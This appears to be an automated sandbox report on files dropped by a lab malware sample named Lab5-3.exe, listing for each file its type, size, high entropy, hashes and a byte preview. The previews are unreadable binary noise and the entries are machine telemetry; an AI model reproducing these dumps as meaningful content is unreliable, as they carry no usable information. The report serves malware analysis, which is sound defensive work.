                                                                                                          Preview:.X......M....=..J.......h..+.D.$...X:......!.(.u...@....!{...bv..O|...H.Q..........P.#By.....75>...5....Y...p.m.KA.Y...H...j.'...4.qW..T....5...,.*.|.2....{."..*S....7G.E....^c..U'.e.`.>.l8G.. p..l[.E............l....'%..`../.].-..r..k...o.K-...3....?...a.....p_XxSa..w....].G.J4..{..9R...m..8._.#e...}V..xg>*m...!.wh......#.@..P..8...rN......V..=.....>{....bHW.disC.2vV..x...P..@v)".9>u?..x.m2UI....n.x.e.w..A.........R"I{..#L9..>....Yr.Y.UH|:.q.[i+_.].../.G.V. ...\8,..p%C..R[MJr.......,.....A.1.M.o.@.R..=)s..K....T...|_.....M..n\.|]jb[a.(w..j.7<.bb.U..7..?p^.o....u.n...!.U>&...7...v.W........S......U./....k..YT.c)S..l/.q.....9R.l..~E....!~.....y.$...z...6..F.....L.!.Xm...^J.<M.8..T4'..ti.s.o..=v.....?..o..&V(.5..E....v/...O<.E:...E...d.;0..bt9.....w1.vYU..;.d...>...j3....RXM.C.1....G.5eN..F.......#......F.n...M.Jo.{.LO...........n..Y..Z....&........t..H(..$o........f.K....3.r....5uE4.;!,x$..w*........#..a....e.N...Qa......
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2688
                                                                                                          Entropy (8bit):7.932239491912442
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:D1UQGdDJATKzhZ9Fvxlt2Nvsw0kisHxMzMzHfUTid3hBaUoSGFcmeykEdEElU92i:JUJDJAuzhfdxlMlswUsHuPGx0uKeY2E+
                                                                                                          MD5:25589401A3B9DBD806BA9B3CC2DFC0AF
                                                                                                          SHA1:C4B74F594D83E50E2A858F29F0886B0CB60F930E
                                                                                                          SHA-256:3431C4A724DD974CF822B1E2AC56C89CEAD1155BC1F6340EA366E9F64266F0D4
                                                                                                          SHA-512:1BDB359ABFFFAA90566C749FB19BB81BE18B688165282EFAE26530E71B56A65863B88E20B7CB7E056E4ECA2BF816ABCB2B5D68B03D2ABC02068154372D6D027F
                                                                                                          Malicious:false
                                                                                                          Preview:/P...y.E.a;,..Z..Q.=@.4....I7.e<.J.,i.7..<Au...ZE.?.6.$BQo..*..\....\.....p5(...*....d...C~.h..LR..E>.....B$f,.(.7+.eA.7.k.a.a.....r|[f.......~M.:.pF....Ovf....R2b..h.......".m..G...k...H@.v.Z~.v...b..eY..>q'..g.&..(f...U/.$a.m...uJ.\U.G.#..3b........s0....(. ,?.....R..*V..m..T.<..X.....#.oA.!.nP..c!.%.Gu.....Aow....y$..D,.(........Y.h...S#....bq.q.y....*...*.e....V. 1....qIG.UQ..W,.(B.?.....O...Mm.....S. O....o. Hx^.....t(..._...x.s=.X....Of.................U...~.....c....Z.....T#=.S.F....xb.8d..{?,Pv.....f.( Y..?..;.X.K........O..Ul.3....t.....*S.A.v.LW..,..T..r...u,>veDM....>&.....>.. .......j..Z.._#pA.c.8...?.....D>'L..".a.OF...qx...XsZn.NN.!RXt.!.ov..Hg.......3.........$...R.m.L!.......^.p6rP..x..9P....P..OMZ..ju7}...H....I.o.E...2.......-..)...fk...)..P.gq...L.;...%...t...T...*.0k.e....+.W..uno.U1..`..E[.d,...L../=...E.....%.b.y@..T..I.]../.+...#...UPUZ....z.......w.oz..$u.Q.[..>...:#..1.i...u.o...PP..'...@;`~5.O[.6.E...2.#.B
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:MGR bitmap, old format, 1-bit deep, 32-bit aligned
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2704
                                                                                                          Entropy (8bit):7.9286976447566415
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:d7mh5FIZSMot8FVhRpCi4PLaDA7rnDEXXBU+MO6HfUTid3hBaUoSGFcmeykEdEE+:5EuouFVhLCJwgrnYnOOVGx0uKeY2ElUJ
                                                                                                          MD5:EC07728D22597D961E6B9C05DDC33124
                                                                                                          SHA1:9E149B8B05E775FB540C90F09CB5C32692867B4A
                                                                                                          SHA-256:1C07A885B2613B8922BE2898EE103ED6728F93895D450857C658DC1A04FDC20E
                                                                                                          SHA-512:9CADCA9902F1FB374454A4D6E12BC22B8EA5F8456CC228361DC4361D783758848F0A38BE7E74F4020B88718D508FB9E32515463057F47B7FD449FE63C3960C92
                                                                                                          Malicious:false
                                                                                                          Preview:xzM.....b.2..M.t;>SF....u&0..B!o.S.../~4..\8(-......Kbb|....{...wk.MIZN-M...)../..AM...f....T..~.........+...:...I...&.A...l...{...p... K..r...f...pz...l..Yj#k.v..$..Y-.I..^3.{....Q.z..B..Zn...|[qT#v.-...>*...\.$T..a....n......}..`._y..F..........#......p....e.f...C_\F9Y.u4Aj...9......X6...V..B..{.|.".1\..O_.8..S...aB.{'.%w..<d'h..Z.ls.oy.vQK.'..U.(.?..o.g...:5......dT0E.!.'..uqy...F.&9&......A.*._X..&....e[.w..w.E.3..!..<1.7.....U.a..A......m...Y.......q.P...f&~.3...t..g.x...Yu-...e.].z..:#......4Z...%..MzF.7.4Ky..s.._.....N}.M.p..\!....G.F!.=.w.*.'.g...~.En n..k...5{Q[Q.......f.......N.}.=..C...lw*SL.....F@.......Tp.M.i.B...0eS..(.......?psI..e.Gr..)........M>b.&...E..._.....k..\.!Q.{..^.]C&.....l..o...M...."e#.I<.@.>}..k<...H{|."_`....).Z....2E..K.$....{.~...x.]7...5[.15z...H.m. ....U.[j.Einc..I....Hm.l*....|.0(F....p....g.W&Csj;.g..:.y..x^.).......O7..Xm....T...$.k...(..b...8[..p....Qz..j.vJ.6@...W..T......b.4...{.Z/.>((..v..UPGX....q......
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2688
                                                                                                          Entropy (8bit):7.931856623491451
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:cl0cY2e3mfJuyALZv+tGjtHfUTid3hBaUoSGFcmeykEdEElU92i:3cPvfJVKZv+tmGGx0uKeY2ElUJ
                                                                                                          MD5:DC2ED3FC21DFE05C3330326ECAF7D336
                                                                                                          SHA1:36A46E99F068AD0C62FCC8197584EEB8054A9E73
                                                                                                          SHA-256:88951C5A8DEF6D8ED2A4E5DF15118B41328D182444FDA0B3A4225F4009DF571E
                                                                                                          SHA-512:75D1DA91CB5B7A9280439E9F0E4AF883354790B8851B29D6ADBC8B0780DBF75DA40F32B12145583023222492B0AB4FD3BF706FAB5E1A299A9C0CDD716F8DC177
                                                                                                          Malicious:false
                                                                                                          Preview:|..t< e.......z..M.K.....bzM...e..F:......]./S..={..m_.?...,......^.90..8.M.....7..>j.R.F...r0f:.;...5....*!.GO.s.{.ss.b@k..P.m.t#~..I8Y.H. 3:t.5&.]..E..9!..s|.Gv........[R[HTi..h...r..wk....S\...}2G.P!..Yl.*.(.T......~...zd....."....*.:.....uQI.1..4e........-.|.{..u.D$...^...|.Pq..9.q...l.u.*.3.._..9%...1..\8.2i..c..iSfT#...S..N.*....._."r...);s[.0..}5.....2f{...Y.5.-..M..B.g...Z.....z.y6.8ql...O[....S.D.J...p.A(?...n..Z...LI%...fZ:.......T!..,..2.h.M.-...jE.2\...`&.?..e..{.^......=.m.%....6;..\.....G.b....'.z.{. .t.f.._.#..s...Jx...k.....:.4u........F<......z"" .u..:..q..&..:.+.Y.R.)..:g...,...&...ce6.s:._.qA.C.z...;.H5.VY\%.-.V.U........4.1 .h.Ir.(.%.<....../.3R..x.....r....N..X.....s.......e6.d.......b...%,q;......Q....r....b...F.d../.Y>.I...6...M..j._.j...z...w(..(}.U..?...w.....;.-...t&..|.Y4"5..De............I8..EG.M..ukw...V.....U$+...).:..E...;..j....+..R<.&pm=.l.9l...T.Z....|.G.vE.8...:].E..I...PZ...97.:#.f6F.^w.......w.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2704
                                                                                                          Entropy (8bit):7.929206132849653
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:jtYtghHr7M9EEaIbJDg1tiz2kKlRVHfUTid3hBaUoSGFcmeykEdEElU92i:juulrQ9ESJDg1tizMl4Gx0uKeY2ElUJ
                                                                                                          MD5:E0BC9EB08A540C9255D62C32F9E079B9
                                                                                                          SHA1:8A5CD190F9D5861321071593C318D508E4A37B49
                                                                                                          SHA-256:4426A47BCAB0C82FCEAA89A7E06E5C90B0F70A76CBB073E260BD91F1E3FAAD68
                                                                                                          SHA-512:E04CD9E1B70F32108412D25C753F4F12C8C3120C7DC30EFA56A0AD988486CD622270CD02873C44566AEC45A22A2363C9AA383B969B902CB5E797CDAE837F0D8F
                                                                                                          Malicious:false
                                                                                                          Preview:$..W3J..;..[..:_..bQJ..VT......w. :.Q])..P;.l.U....t^.,..D.4.8/.z/...?......^.5$V.sR$.BY...I.CU.Q.%Az.7#.v.~i.....Yp..{..J.!.k..L.l..a.-B~~..C.."m.C......pu.".........wX.P8...`..M....:.#...;..g.&R..B.WBq.I*.~x.."..+3.;...Z-.V...A.O.N.g.^..'......D..L..ge>w=~F.E.\...>k.^.W..q8'$..N.ncg.q...+.3.V]H...L../i...3.`{.O}.]}....Z..Q.=r.Z..r.d.e..w>.^erbK.....=.w.s\......c.D.m...P..5(....Tw...MGzdT...............n..+$./..n....-....E....Q...U...O.\i..T..O.Ly...V.e....Fge*p...S>.$...E.....(.|...h4..&..P1../.....!...r.....=.m7...*MU.db...~{..)7.r..Z3.D...!....K}7...C.......J\$......b&.F.=...U<...as.G..&.J.Z...6^.%....,.Z.. .&@..]...(g......m."s.H.9.W..aD...N.Q....y.|..?.]."...K.F.A..#....6.>X.hC.+......Rg..Y.x. .;....3*....F.....j$`g.g...Ja.\.]4.!... 8&En(.n=..gd.N.m-..nnWG%....".^.e..B.]gv.`..F.C........F.o..3! ...l.....'$....g.....N.Sm..ac...I.?........X....}B H...R.L.).......r=VD...IeJ.....\...........A..T.\....9.h.`1.v....e.P.I.5.;....8...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2688
                                                                                                          Entropy (8bit):7.941806800758109
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:8PQyLFpUeTCdOND8gWPBtp9wa+uHfUTid3hBaUoSGFcmeykEdEElU92i:2HbUMCWSrIvBGx0uKeY2ElUJ
                                                                                                          MD5:BF0889D0BE54AADA6CEE03462F23C70D
                                                                                                          SHA1:C457D0F381C480ED3AED37B63D287F7A19BEE6A5
                                                                                                          SHA-256:E3E3167A8422692C0BE1E8CF19F542FF68BA91B007ACD2F039209945AD6EE66B
                                                                                                          SHA-512:F3C2E0946F9253A23E8940BDB2CA8023EB176CB46AB3364A6F1CBB65F6F4A93630D6B292C0BEA5C7673BF0D89BDA09EA8823996F97C52AAEBC64672BF54A864B
                                                                                                          Malicious:false
                                                                                                          Preview:?..eq...h.^..c......S....4.&E.........U+......W.../..3..=..B..2U....V_...R.a....eR..d..S..c0.{~..-.:..i/W*Z...`..+. .m...cO?)..B.TH..<.. .u..X2...*:Hx$.Q....Xy.+Z..x...\....?..Bt...4.!|.Y..b....0n%.A.w.|...7..9FC.\/.a.D.RO...).,.Sd?G.4...i..t...MpmT.j.~....._...HIn5..J.O0m.D..1.QX..o.P`".Y...-...f.V.e...K...7.$..t..1.:e.58..w+.:......"..ZI..4..Mn..g....A.Sg.....1#..{..z..A..QRI.>a..6(...;..c.R./x...j.D.k..c|...`...I.3%..=.k|Z.....c.|....3..b.f.y.J.....w.H7.C@....U...Mu=i.6_D.v.;u...zw...8.T..U.RkLcVQlU.......*.K....#@.]+..2...j.|S.y....v{...L..`.@._Q.36.%.g.D..*.(.A.y:.4...i.E..S........._..=...w...wm......<.D.O.z^..eK-BS....[...K.1.....2...%.[D8.C....?....F..Q....@....f.).q..]..$...Z..m.[.......$M4....u...&...>......1.X.HD.?...).kM+....q.".O+|2.......h.A./...S......C..T&i...9>...(-F..t..i.(.._.....[.w.n..I...5.j.%...I/6....k..,.P.a...s.n{.(..#....F Pq.M..IH.0....$..`zv.......44..0.....-5q.p...AF'....v%_...-.n.... Y....RR#..g...E
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:DOS executable (COM)
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2688
                                                                                                          Entropy (8bit):7.926709195504142
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:1hsLQfYo6iVUoe228OCPkyeQrHfUTid3hBaUoSGFcmeykEdEElU92i:1usfYo6i+19Fy+Gx0uKeY2ElUJ
                                                                                                          MD5:5C8F41F4E4566D79E3B7C17773E248FE
                                                                                                          SHA1:925AE31F2FE9FE0FDDDAE286D07EF1DA46ADBD7D
                                                                                                          SHA-256:AEC0CB0F9592CBAB8694571AB24B2DF12433A7549E76FA07AE98F1BE24067E45
                                                                                                          SHA-512:DB79CB7E92EF0B5CA78FADD6780045846BBB1C8726816365B3E2798A467989E3FFDC5BAB615194C88732FCF359F4087221EAE020946777C2ECDDFA02A6920C19
                                                                                                          Malicious:false
                                                                                                          Preview:.:..si.,.....jg5Fo.;v....f.Y9..4...O]..U..MXUO.-..j.{d{..Ai....E.......04.-.K....O.QT...N....$.P.7.....31....j-.n..y..Ui-;5....k.TS|.&.. ,...|..9 .x.t....EX......."Y...h.Z..j.GO.!l..../b>..D.tF..Z..4.$.s...$S.J.. :.HV.l...A$..i....P:*.I.....M.0.......#.}+6[X_.F1.5\..Al.._...L.@.@. V.}..^:h..O.n.$a>.cE.BF.0L2..-..b ..>..p.J..]...-."6...Xn.[.[*.....">~......4..A.N..v.p.d...Z.|9..TU!.1k...C..Qh....~.99........H......{..bBN..u.'.g5.[.D.z4.|... ...G.....s.yaI.J.b"j.."...Uo.......Q.O...&..]s.G.E.O..QjSJ.w..jC.h.L..H..OF]Xw........}*Q,y..<pF......ntkM....t)G..9..Z.2}D..w>..C.2o......k..Y).x..*.(.......N..T.....z..(n.!..&..M.....AH.7..we..1V..(?).jD.V...-.l..~..2%`._.>@.,a..A..v._0+..C..!.Wo?.Z..$.....HA.....A....P..7......lW...\v.....OOZz.!...`..!.,..s..-y....5.hF2......Y.....C.D.i..b.XK....U'..`.=...P..1H...54...vpl.B..p.........9..W..PS..Y..z.pZ..y........7r.=}......+q.=.1.3.........y.....|.{.V{8 ;..y/.:.o....Q..I.X..B..E....#..S..i........()V.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:OpenPGP Public Key
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2704
                                                                                                          Entropy (8bit):7.925613215380758
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:QzKdiN3xuAlwxzQ4cnj5XEfKHfUTid3hBaUoSGFcmeykEdEElU92i:sN3xudxz7mj5XelGx0uKeY2ElUJ
                                                                                                          MD5:D33F6EBA655CBFCB9186B4E651C7FFBC
                                                                                                          SHA1:6286E6D917294F0A31D36A20F6FE8DB72C3877DD
                                                                                                          SHA-256:02A342D892890C598BD2D95CB77F357853691FC374D00C93EEAD6566F091764F
                                                                                                          SHA-512:271C6344FB44DBBC570B72419A12F4650E0C2640AED3EE1EF19FE73154154481EE2A068E0B2BA224CAE7388BA45D3662ABB4A787B60A49DE62360379691E53EF
                                                                                                          Malicious:false
                                                                                                          Preview:....+x....8..>.?.^...Q.`..L..%.A...Qt.*..lT.h....~.Q.[/.b..:.T..u..b@.....u..':Z..e..]..OnC>v..!t...y<j..:.h^..G....0nL=..?.a..f}...]X..f..F.F.....*....W)KKs.r...J.....*...D..d.yaf$rf.?.<.9o+I.K}.l...i........7p.....^.\j..m.....@.9...+.i;.H.... ..A..wTleI.g(3..l...G.qr...k...cyE.....'.*.......to..xW=./`.G.ID.gY.<.C.C.>x.-j/.[...s.C...@J.Cc.PN..W.)."x.RN7.@alcb.o/:.'..'..4.\.[.3..l........q..k{..m.^bW...e.1..U..A=..e..........#..[..E8...db..f.]. P.(..2..H.-X_f.B....\.bSW.....+...oF......)~..%M......7....9...f...7..{k.^.].. ..../...(~.j$.'.&.6}.H..'.Fd..=..V..........Z!..^.N[!..Z!.;..g...P2.g-Kr...:#..a..5J%7.jx\..w[N.5..[K...Z.eB.Oc...2...8Z./.m@...m.....K..T.f"../.1.b.".......k.<.D...)#<..$.JK9..L.f{L....ft.....:.p...".W...7....0rT.....X.sB.)..c.D....y!F.._*b.*.^s...2.d....%..1.5*1...[...}4.hH>%l..^.....t.F...."N}H.Ad....!......Ye9.F;BW.M=.W.X.e/..KtP..^.'5Q.F@....[.Z...,........S...6.b..D.....7.o...4.Yz[...i....sT.*.s....D..~.L`..9.*7. ....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2704
                                                                                                          Entropy (8bit):7.931273008417015
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:jp3QnrqoU8pSV86ydPFObKYJU6VXhbHfUTid3hBaUoSGFcmeykEdEElU92i:50uB8pS/ydPQuYJU60Gx0uKeY2ElUJ
                                                                                                          MD5:05D8A96E2473C3ED0D88C159939F73A5
                                                                                                          SHA1:86606AADDB81FBF3976264BD3E0787173B66E446
                                                                                                          SHA-256:3E5E8953A40937F4D8F36EFDAF9E0CFF666AE30F6F8B1CF317AED6B4DD054C1D
                                                                                                          SHA-512:6376E4E0C513E60F81108E7099F9CB6FA09267DE4CD13401487F80AF71164416FF0F2F1C3A761A726BC10486D44EF707AFB9BDE17102FF1339059D7BBA3FA478
                                                                                                          Malicious:false
                                                                                                          Preview:O'h2...A.".......\W..{..YI;F.R..V+5b....ov.[5c...X..N...'./^.S.[..k...t.?@..'....,.R..4.0.*......SA.={I.Q.../OY..E.)..9<5...;a.Y.Y........Oh.Y...r............. x.R.Stx.f..../......,K$....k22....^...s...}.>.?.i.]..e...G4+}.b.N..>..1...ZG....9.`.x..N..V.ak...O..n.Y2...@)S%D~....r=.....@}.x.j}......gY..W.....H5...5..H...FTqY.>:.......[I.A.W..'.7`p....&....\b.......E..V++...Y]...V7:...V.a....$ .......&....w7..$......g.;.v>..PwZ.s........:....*.!=4r;.....w.+....U.iS6h.>J.!.?P.Zc...=x.]..2.SM......_y9w{.K..-a....V1..."q..^......-Y.h"...VA..Rm..........7.+.Rl.%..v....xlF.....<..I]..L.....x.n..Y.|...).e"_.3>H#|J.......ec!Id.dl..,..U`ri....[.vy$.<.~I.i...}H.P..?.:2.c...8.<.....c'..o.y..T.m......Y....\.E[..#.B&r..j...J.?.....e.....Hk..n.f..A..m.!d+.,..&..I'#"E..IP..g-A..V.0.....E.U.v...........e%......C....a....W;.z4...W.W..z..&.!.v....J;Q.*j..g#.a.r.5.~..w....qZ$.j.b......B992.F;.p.5...R..j....W..].j-...,K.xh..v....J.$.......Z^R..2T..M...V
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2688
                                                                                                          Entropy (8bit):7.935541626395391
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:Nv0qlnoO1DPC3Lal4zyQf2PzuYNN1GTHfUTid3hBaUoSGFcmeykEdEElU92i:J9oO1Dqbjf2PiCLGx0uKeY2ElUJ
                                                                                                          MD5:D10BB8DE9A3D90405CDE2BEC8B26FB3E
                                                                                                          SHA1:AFB4C5217B2421066F19C0E6E9AE2C18B0245438
                                                                                                          SHA-256:4ADC42F2905B575A8443C51C47E2EC3BEAD822123BEF201C508D9D924532113F
                                                                                                          SHA-512:C1A1FD146004F6526E8FEFAD296665B64D65FFC8DA4F231F08B91702AEE3307531BAE9CBD38A74D22A13FA874C9AD376C6B006742B43424792A76EAC8F08FA47
                                                                                                          Malicious:false
                                                                                                          Preview:....KS].....{.N.......~....r*>.j.{.! ...8K`.TQ ....J...|.?9.....z.xB.).Ok..K...:s%.8.U..0.2p.5l....u.`.p.D..{9.G1..._..!.....$z.o.."Q.o.w...r....C......|.<)./.[...,C...3&e.]G.N...:...=.k.^..&.IP..ko.[..f;.Z.z........cvL.=q3...I]..3@.....GM...g..}t...A;<.=.e..<3].N..(.~..+.Hw.E.C.....?...yM.>p..A......"P.0t7......{.....?}..../fr../.d..i$...5R.=.We.m.Z.=O....V.....[...<K....W...V{.<....H+......s....0pP.&Pz.....s.#..zo..v$).....X.p.).....O.....vD0.........<...]!...d.-...tMb....2....X...@6..O........`..N.0c....b.f.?....E\.......O.G".r7L!..R.j..9g.KR.YK.|{...{..E.._|t`...q../d.~..}.j|.k....G.~.d..B'nq..L.5...\0.?.....#LT+NN..@.H~...}....H..}Fbi.-.p.*.........K.0...=S?%E....T..c. j.W....."7._!w6..#t.P.K.a....>0.P.q.7$.9.j]..Q........D....<.0\...?^........z|s(._.^..$.^.k&W..'..U..z(1...B...I.h* .Z.y..f...$.=..p.6n..F.....t/...F>.M.2.P.>=........66i.`{+.X..Lhlw"`l.Z......).l.Y.:.e......F........r..1..%E..@..Sc..2{&.8a..~.&......P< ..,.s.. ..u..'1
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2720
                                                                                                          Entropy (8bit):7.936723442311526
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:Z4sWw6v55RQZeev8099Uw1SBzHfUTid3hBaUoSGFcmeykEdEElU92i:Z4sWwUrWZeEfzgAGx0uKeY2ElUJ
                                                                                                          MD5:328799F72645A8453597A38E959AC437
                                                                                                          SHA1:B87DBB52E7298AA2C12A89C6EB2D0809D2AE4EAA
                                                                                                          SHA-256:DBD6584CDC1FBE424432B760A5ECC9D9C8719C6E8D537D491C28F8670D5CC524
                                                                                                          SHA-512:7B60930ADE5628AD475A40A84CFBD8085B9223C390D194B2EAA0D05362C788E85DFD15947C8DFE09832B73D0EBF4755CEB38AD734F5EEBA98703EBF0D1739EBA
                                                                                                          Malicious:false
                                                                                                          Preview:J.....).E...5.f.'...50/.&...|.C%..mO.L......)3..{u.U.H. .p......61.!..&P........D_ ..#'w.A.@.UO...>........\,*.)..1w..&.....q;B......2Y.V!.D\].....41_.i.s.Nw.fi..H...}......y.{..}T.YA..<..Zn......:../....M.82.V`..R.h..S.2.[.x.;*......Q....zA..9..'.u...qC.n.(4D ..g...j-[.<.k..,L..F..DH...|..X~.+..!.....df...%...Q3....T7.#....W.9......w...|Ta.b.......P#{.2|q8.D.....AH.o...l.9'.Y.,.L..G..u..._z..L..eT....d.E<t-H9..&U....&..C*.P....p....E..s.9....$j.9X...;q\<../v..K..JL3..{M.....u.$.>I.o.o.RI*....rm...G9v../.,|..P....;y..J.E.......S..wC_n...._..f.EF.....P.A(/.......w.T.......VB#1N].U=.z.3F.>k.".[...D.s.7..v.*...H..$......e....s.@.~G.s:.1..Y..e....t..Y.z..l*...E.G,O...n..9..!.g..TQ5.g=OM$....u...x...T...G..]...;K.k.O.g.g;.qm...;b.<^.4.#.?.4T..Y....q....<+C....:[...8%...m.....{...>.......+qK....r~..x...G.....8...$...S....1j&...8...Y5..l.....s....Otr?.l.@r..L...E..Qa.N...W.%a.}...8$.t.5..h.....<.......U.........[W...c$."nb;}._.lk..;..&......M.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2672
                                                                                                          Entropy (8bit):7.939468084708928
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:WggzlEJ/L1fgQg+C/y2JfWvGViqyyN2BHfUTid3hBaUoSGFcmeykEdEElU92i:WggRe/xfd1dGViqtN9Gx0uKeY2ElUJ
                                                                                                          MD5:49D05203668D0FC370B0A9A282076D08
                                                                                                          SHA1:20C1799FC0CFDB966ADB6FD26F2A3BA1790F7A16
                                                                                                          SHA-256:49E03743C48E9473582CA410C1E4E179453895B416C70C29BF7F3545DF01458D
                                                                                                          SHA-512:F60B354178D4EF1448EDE8507B62697FEC1FC823FC993F3B60B36AF017E6D9CDAABBDBB30F078FB4CF56ED36B3FF4F6B3F4D6C164115B180F0E269BCC6040663
                                                                                                          Malicious:false
                                                                                                          Preview:...q)....x.'..X..5H.. ......;...{lY....b.$I.*.X.0..ay4.5d....;...N kDo.....(Z ....P+fb,...B..p.%.:8d1:.Q.TK...;RV}.t.1|*.3.h.Q....f.......K.u6S.%.m.m T4G..u.I...{*/-.M.}...._....rE.:......|......2......Lu...h.t.+.O...o,D.....Y..n?.....}.r....^.............a..8.D9.*a o..]Y..e<..T.8...g.O.x..~.........L......Ht.8.HH.{,.TEG..#..%..1..;9?.~.K}...jtA..K.B...>.....s.RI...u....9...z]f+...>rQ|d.%..f.[D.{3...:.Ns.*N.0...NE4.%.?...e=|Hi..zJ..7L......`.......}......\Na..;........T.".H.......].r.I.".9$6....).8.{7(4.N+R..3...j=V.....b.L..+.........q..Sa...z......Xtv..........d.yA..d.8..Z..^...."V;.1%X..;Y..%.|.,@..G.......s.x..[.n9^"..W....G]pW...~rQ.Pv..LzGD.O&.|...P..e,..1U..gH..h^n7.9mP..Mq7.6z........k(..tI......z$I.c.m....Q...L....{^.B..k.Dhj...&..;..c~I.,H......,k.4.._.[..(.Dl8.pL.&k....@.........'..X....../x..rJtx^B...Wl..d...s...PM.....D.AA!.....uFQ....O.b...y.O.....A..@...#.9...7.d.S.`A........rku].....3...1.+.0.*T.....t....d.j....k..f.X
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:OpenPGP Public Key
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2752
                                                                                                          Entropy (8bit):7.927749553306431
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:Q5w57xB/Npc6Unj537ALGUBIGlE5Yu1SyHfUTid3hBaUoSGFcmeykEdEElU92i:QyJzxUnjN6Xlu1StGx0uKeY2ElUJ
                                                                                                          MD5:C1E3A649D3D93E9365CC9B191886D778
                                                                                                          SHA1:5DF65B63A3FF7152D8D1860D4759ECE5996456E8
                                                                                                          SHA-256:4CBAE8A87610F2A770D91BFA1D1FFC4B47E84454DBA433A66B68C05BE2F4590F
                                                                                                          SHA-512:323FEE6F068894D9D7E8F15047898513AA4356B538BFCDE9D76E26B6B09EDAB4466CCA61064BE3DE5F5896B9E92B18AD0046DFAD7E1DD851DA89134E98F88C19
                                                                                                          Malicious:false
                                                                                                          Preview:.h|..;.b%...M..y.........p.".#..W.*.B.o .......H.Th.;...:\o..GC.hm..[.`B.#l.......o._.h...d..C.3A....b.H.|5..GI*Y.N.K.....x?.......k..0f3..R ..:P...~.K....p!.......GEB.HS..eM.F...2c..$5~....<v]F.d..:...I9NX..8N.Mi...?a.:.D.A....\... .1h...w.....R.N.R..x..-pG. ....Z......F...t.Ec..._......Y..w.....g.".A;.j3..w.o.GzT..D..[.;j.o..^,b....t...1{.0B5.rBQ.9...A.^.U.z.+...t...z@..1y..G......H.T.3b..xV.LN..&....T._.....[l..l.ZL_.7..........Vj.5..".]..c.~]....^.......M.i..V.....1MxAyu$..%7'....iDJ.e.......7|..@?(.w4J..4..Ut.p......\...7L....T...........o.k0..{..<.}f.hM.[......M.b1.s..)...yC.D.J..#.L.P..1....G......@...GS.s...n.1....BX.q` ..{..gK.|..nt.]..?.E.&f...(.K..Y6T.^....5....8\.(Vu^.7.N.53...a...d.JJ...UG......)M.z]=XX.8k....1"F%.v7..{..../...R..D..../.......4..FF.{...$......d.R2.H.... b.<.........Oa..R{.......GW.*.........(b..l.S.w..)2.....vV.......6.G.........cENl.c.!...__.o#i.....oS.9..!u..b.. <.GE..M.....=.q..R.7F....7..?.. .:.b..2.&.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2720
                                                                                                          Entropy (8bit):7.9285799434436255
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:XPdfFFix0UhB5UG0bxctj2axkHmvtOlnWsHfUTid3hBaUoSGFcmeykEdEElU92i:XPdfFUxglcrcmvYlWrGx0uKeY2ElUJ
                                                                                                          MD5:B43C0F714186061417521A8F142E8F4E
                                                                                                          SHA1:7FF9A7C191811959310706F2F96159DEC7D3D1E3
                                                                                                          SHA-256:29B46B637D5BBD752DE926134B9ADD577C2AF2040225FDD813030C68D391F3A8
                                                                                                          SHA-512:B16AD3E612F44D25786D7BB00117CE896517EA13FA575D9C5A0026482FED72842C6DA61C13906D1883FF7BE74F54E7EF0A22A8C8D29403F39CA781DBBD2FDFEF
                                                                                                          Malicious:false
